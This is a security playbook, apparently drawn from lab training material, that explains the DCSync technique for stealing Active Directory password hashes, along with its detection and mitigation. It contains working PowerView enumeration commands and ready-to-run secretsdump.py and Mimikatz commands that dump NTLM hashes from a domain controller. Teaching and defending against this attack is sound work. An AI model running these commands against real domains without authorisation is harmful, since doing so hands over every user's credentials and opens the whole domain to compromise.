This playbook provides a comprehensive guide on the DCSync attack, its mechanics, detection methods, and mitigation strategies.

What is DCSync?

DCSync is a technique used to steal the Active Directory password database by exploiting the Directory Replication Service Remote Protocol. It allows an attacker to impersonate a Domain Controller and retrieve user NTLM password hashes.

How DCSync Works

1. The attacker uses an account with domain replication rights.
2. They request password replication from a Domain Controller using the DS-Replication-Get-Changes-All extended right.
3. This allows retrieval of NTLM password hashes for any domain user, including previous password hashes.

Required Permissions

To perform a DCSync attack, an account must have:

• Replicating Directory Changes
• Replicating Directory Changes All permissions

Note: Domain/Enterprise Admins and default domain administrators have these rights by default.

Detection and Enumeration

Using PowerView

1. Identify user’s SID:

Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl

2. Check replication rights:

$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"

Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get') } | ? { $_.SecurityIdentifier -match $sid } | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl

Executing DCSync

Using secretsdump.py (Linux)

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/[email protected]

Options:

• -just-dc-ntlm: Extract only NTLM hashes
• -just-dc-user <USERNAME>: Extract data for a specific user
• -pwd-last-set: Show password last change date
• -history: Dump password history
• -userstatus: Check if a user is disabled

Using Mimikatz (Windows)

1. Run PowerShell as the user with DCSync privileges:

runas /netonly /user:INLANEFREIGHT\adunn powershell

2. Execute Mimikatz commands:

.\mimikatz.exe

privilege::debug

lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

Additional Considerations

1. Reversible Encryption: Some accounts may have passwords stored using reversible encryption. Enumerate these accounts:

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

2. Password Audits: DCSync can be used for legitimate password audits. However, ensure proper authorisation and documentation.

Mitigation Strategies

1. Limit accounts with replication rights
2. Implement strong access controls
3. Monitor for unusual replication requests
4. Use Advanced Threat Analytics or similar tools to detect DCSync attempts
5. Regularly audit accounts with sensitive permissions

Recommended Reading

• Microsoft Documentation on Active Directory Replication
• MITRE ATT&CK: DCSync
• Detecting DCSync Attacks

By following this playbook, organisations can better understand, detect, and mitigate DCSync attacks, enhancing their overall Active Directory security posture.